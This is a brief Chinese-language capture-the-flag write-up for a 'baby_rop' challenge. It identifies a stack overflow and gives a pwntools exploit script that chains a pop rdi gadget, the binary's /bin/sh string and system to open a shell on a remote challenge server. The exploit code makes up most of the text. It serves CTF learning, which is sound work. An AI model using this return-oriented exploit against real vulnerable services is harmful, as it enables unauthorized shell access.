checksec一下,栈溢出
IDA打开看看,很明显的溢出点,/bin/sh字符串在程序里也有现成的,通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='amd64'
context.log_level='debug'
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
io=remote('xxx',xxx)
pop_rdi=0x400683
binsh=0x601048
system=0x400490
ru('? ')
payload=p64(0)*3+p64(pop_rdi)+p64(binsh)+p64(system)
sl(payload)
io.interactive()
附件:baby_rop